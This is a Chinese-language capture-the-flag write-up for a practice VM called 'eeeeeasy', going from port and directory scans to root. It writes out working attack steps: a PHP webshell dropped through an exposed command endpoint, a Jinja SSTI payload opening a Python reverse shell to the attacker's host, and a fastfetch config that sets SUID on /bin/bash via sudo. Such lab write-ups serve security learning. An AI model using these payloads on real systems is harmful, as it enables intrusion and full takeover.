2.eeeeeasy

created: 2025-05-17 14:12
tags:
  - SSTI
  - 靶机
Type: Note
aliases: 
updated: 2025-05-17 16:01

1. 信息收集

1.1. 端口扫描

┌──(root㉿kali)-[~/Desktop/hmv/eeeeeasy]
└─# nmap -sCV 192.168.56.106 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 02:12 EDT
Nmap scan report for 192.168.56.106
Host is up (0.00039s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp  open  http     Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.62 ((Debian))
| tls-alpn: 
|_  http/1.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after:  2035-03-30T14:05:29
MAC Address: 08:00:27:A0:E2:5A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds

1.2. 目录扫描

dirsearch 默认字典没扫出来
换字典扫出来一个 /hacker路径

┌──(root㉿kali)-[~/Desktop/hmv/eeeeeasy]
└─# gobuster dir -u 192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/hacker               (Status: 301) [Size: 317] [--> http://192.168.56.106/hacker/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

1.3. js探测

访问目录，是个黑客的演示网站，应该是没啥用的
在浏览器插件里面看到了关键路径
Pasted image 20250517142632
试试

┌──(root㉿kali)-[~/Desktop/hmv/eeeeeasy]
└─# curl https://192.168.56.106/hacker//supercoool.php?cmd=ls -k
<pre>css
dab.png
geek-hacker-typer.jpg
globe.gif
green-back.jpg
he6.jpg
img
index.html
js
lock-green.gif
lock-green.gif.ifl
map1.jpg
og.jpg
supercoool.php
</pre>

直接写后门弹shell即可

https://192.168.56.106/hacker//supercoool.php?cmd=echo "<?php system(\$_POST['a']); ?>" > /var/www/html/2.php

/hacker目录写不了，没权限，写html目录即可

Pasted image 20250517143935

2. 提权

2.1. vim缓存

drwxr-xr-x 2 welcome welcome 4096 May 16 11:06 .
drwxr-xr-x 4 root    root    4096 May 16 07:05 ..
-rw------- 1 welcome welcome   13 May 16 11:06 .bash_history
-rw-r--r-- 1 welcome welcome  220 Apr 11 22:27 .bash_logout
-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc
-rw-r--r-- 1 welcome welcome  807 Apr 11 22:27 .profile
-rw-r--r-- 1 root    root      19 May 16 10:48 .viminfo
-rw-r--r-- 1 root    root      44 May 16 11:02 user.txt
(remote) www-data@eeeeeasy:/home/welcome$ cat .viminfo
welcome:welcome123

切换到welcome用户

2.2. ssti

welcome@eeeeeasy:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for welcome:           
Matching Defaults entries for welcome on eeeeeasy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on eeeeeasy:
    (qaq) PASSWD: /bin/cat /opt/flask-app/logs/flask.log

welcome@eeeeeasy:~$ sudo -u  qaq /bin/cat /opt/flask-app/logs/flask.log

 * Serving Flask app 'app'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 135-249-609
welcome@eeeeeasy:~$ ss -tunlp
Netid          State           Recv-Q          Send-Q                   Local Address:Port                     Peer Address:Port          
udp            UNCONN          0               0                              0.0.0.0:68                            0.0.0.0:*             
tcp            LISTEN          0               128                            0.0.0.0:22                            0.0.0.0:*             
tcp            LISTEN          0               128                          127.0.0.1:5000                          0.0.0.0:*             
tcp            LISTEN          0               128                               [::]:22                               [::]:*             
tcp            LISTEN          0               128                                  *:443                                 *:*             
tcp            LISTEN          0               128                                  *:80                                  *:*

可以看到内网开了一个flask网页，端口转发出来

welcome@eeeeeasy:~$ socat TCP-LISTEN:1111,fork TCP:127.0.0.1:5000

很容易测出来存在sstI ，直接弹shell

{{ cycler.__init__.__globals__.os.popen('python3 -c "import socket,subprocess,os;s=socket.socket();s.connect((\'192.168.56.102\',1133));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\'])"').read() }}

Pasted image 20250517155420

2.3. sudo利用-fastfetch

(remote) qaq@eeeeeasy :/home$ sudo -l
Matching Defaults entries for qaq on eeeeeasy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qaq may run the following commands on eeeeeasy:
    (ALL) NOPASSWD: /usr/bin/fastfetch

--file 参数任意文件读取

Pasted image 20250517155614

也可以利用修改配置执行命令
github.com/fastfetch-cli/fastfetch
Pasted image 20250517154541
仿造写一个modules配置

{
    "modules": [
        {
            "type": "command",
            "text": "chmod +s /bin/bash",
            "key": "Editor"
        }
    ]
}

然后自己创建一个配置文件

#先生成一个默认的
(remote) qaq@eeeeeasy:/home$ fastfetch --gen-config
The generated config file has been written in `/home/qaq/fastfetch/config.jsonc`

#修改模块
(remote) qaq@eeeeeasy:/home$ cat /home/qaq/fastfetch/config.jsonc
{
  "$schema": "https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json",
  "modules": [
    "title",
    "separator",
    "os",
    "host",
    "kernel",
    "uptime",
    "packages",
    "shell",
    "display",
    "de",
    "wm",
    "wmtheme",
    "theme",
    "icons",
    "font",
    "cursor",
    "terminal",
    "terminalfont",
    "cpu",
    "gpu",
    "memory",
    "swap",
    "disk",
    "localip",
    "battery",
    "poweradapter",
    "locale",
    "break",
    "colors",  

    {
      "type": "command",
      "text": "chmod +s /bin/bash",
      "key": "Editor"
    }
  ]
}

#然后执行，加载模块，执行命令
sudo fastfetch  --config /home/qaq/fastfetch/config.jsonc

Pasted image 20250517160030